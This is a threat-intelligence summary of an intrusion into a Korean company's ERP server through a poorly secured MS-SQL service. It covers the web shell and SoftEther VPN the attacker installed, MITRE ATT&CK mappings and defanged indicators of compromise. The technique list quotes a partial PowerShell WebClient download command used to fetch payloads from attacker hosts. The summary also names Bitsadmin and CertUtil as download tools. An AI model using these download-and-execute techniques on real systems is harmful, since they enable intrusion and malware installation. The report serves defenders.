A Korean ERP server was compromised via a poorly secured MS-SQL service, leading to the installation of a web shell and, ultimately, a SoftEther VPN server on the infected host. The operation shows attacker use of system discovery commands, credential theft, and VPN-based C2 infrastructure, with multiple IOCs and download URLs. #SoftEtherVPN #MS-SQL #WebShell #GALLIUM #ToddyCat #UNC3500 #SystemBC #Bunitu #bashupload
Keypoints
- Attack targeted a Korean company’s ERP server by exploiting an inadequately protected MS-SQL service to gain initial access.
- The threat actor installed a web shell to maintain persistence and control over the infected system.
- SoftEther VPN was installed on the compromised host to function as a VPN server, potentially forming a cascade VPN to reach other networks.
- Early reconnaissance used commands such as ping, whoami, ipconfig, hostname, tasklist, and netstat to enumerate the environment.
- Payloads were downloaded from remote URLs via PowerShell, Bitsadmin, and CertUtil, followed by a downloader batch that installs SoftEther VPN components.
- Credential dumping activity was detected (Mimikatz reference), indicating attempts to harvest stored credentials.
- IoCs include MD5 hashes, download URLs, a VPN C2 server IP, and a suspicious domain (bashupload.com).
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Initial infiltration occurred through attacking a poorly managed MS-SQL server (‘initial infiltration occurred through attacking a poorly managed MS-SQL server’).
- [T1133] External Remote Services – The attacker installed SoftEther VPN to access the internal network from outside (‘utilize the infected system as a VPN server’).
- [T1505.003] Web Shell – Web shell installed and used to execute commands on the server (‘The web shell was installed… logs of commands… were found’).
- [T1105] Ingress Tool Transfer – Payloads downloaded from remote URLs using multiple tools (PowerShell, Bitsadmin, CertUtil).
- [T1059.001] PowerShell – Downloads and executes payloads via PowerShell commands (‘powershell (new-object System.Net.WebClient).DownloadFile(…)’).
- [T1036] Masquerading – The file vmtoolsd1.exe was suspected to be legitimate because a VisualStudio Code download occurred in the same directory (‘believed to be a legitimate file…’).
- [T1003] Credential Dumping – Credential theft activity indicated by credential access indicators (Mimikatz-related).
- [T1016] System Network Configuration Discovery – Discovery of system configuration via ipconfig (‘ipconfig’).
- [T1049] System Network Connections Discovery – Discovery of network connections via netstat (‘netstat -ano -p tcp’).
Indicators of Compromise
- [MD5] – aac76af38bfd374e83aef1326a9ea8ad, ef340716a83879736e486f331d84a7c6
- [URL] – hxxp://45.77.44[.]127/vmtoolsd.exe, hxxp://167.99.75[.]170/vmtoolsd.exe, hxxps://bashupload[.]com/-nsU2/1.txt
- [IP] – 45.76.53[.]110:443 (VPN server)
- [Domain] – bashupload.com
- [File] – vpn_server.config, hamcore.se2, tun02.bat
Read more: https://asec.ahnlab.com/en/66843/